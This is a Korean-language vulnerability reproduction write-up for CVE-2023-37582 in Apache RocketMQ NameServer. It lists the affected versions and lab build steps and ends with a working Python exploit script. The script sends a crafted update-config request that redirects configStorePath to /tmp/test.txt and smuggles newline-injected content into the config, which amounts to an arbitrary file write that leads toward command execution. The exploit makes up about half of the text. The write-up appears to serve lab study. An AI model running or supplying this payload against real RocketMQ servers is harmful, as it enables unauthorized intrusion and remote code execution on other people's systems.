CVE-2023-37582 Apache RocketMQ 원격 코드 실행 취약점

취약점 프로필

Apache RocketMQ는 짧은 대기 시간, 높은 동시성, 고가용성 및 높은 안정성을 갖춘 분산 메시지 미들웨어입니다. CVE-2023-37582에서는 CVE-2023-33246의 불완전한 복구로 인해 Apache RocketMQ NameServer에 대한 무단 액세스가 있는 경우 공격자가 RocketMQ를 실행하는 시스템 사용자로 명령을 실행하는 악의적인 요청을 구성할 수 있습니다.

영향을 받는 버전

아파치 RocketMQ <= 5.1.1
아파치 RocketMQ <= 4.9.6

환경 빌드

Apache RocketMQ 원격 코드 실행 취약점 CVE-2023-33246 환경 설정 참조

여전히 디버깅의 편의를 위해 Linux에서 RocketMQ 관련 서비스를 빌드하고 소스 코드를 사용하여 시작합니다.

총 2개의 서비스를 실행해야 합니다.

org.apache.rocketmq.namesrv.NamesrvStartup
org.apache.rocketmq.broker.BrokerStartup

먼저 NamesrvStartup을 시작한 다음 BrokerStartup을 시작하고 환경 변수 ROCKETMQ_HOME ROCKETMQ_HOME=/home/ubuntu/Desktop/rocketmq-rocketmq-all-5.1.0을 구성해야 합니다.

취약점 재발

파이썬 스크립트 실행

import socket
import binascii
client = socket.socket()

# you ip
client.connect(('192.168.222.130',9876))

# data
json = '{"code":318,"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
body='configStorePath=/tmp/test.txt\nproductEnvName=123\\ntest'.encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2) # 一个字节是2个十六进制数
head1 = '00000000'+str(hex(json_lens))[2:]      # hex(xxxx) 0x1243434 去掉 0x
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')

# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)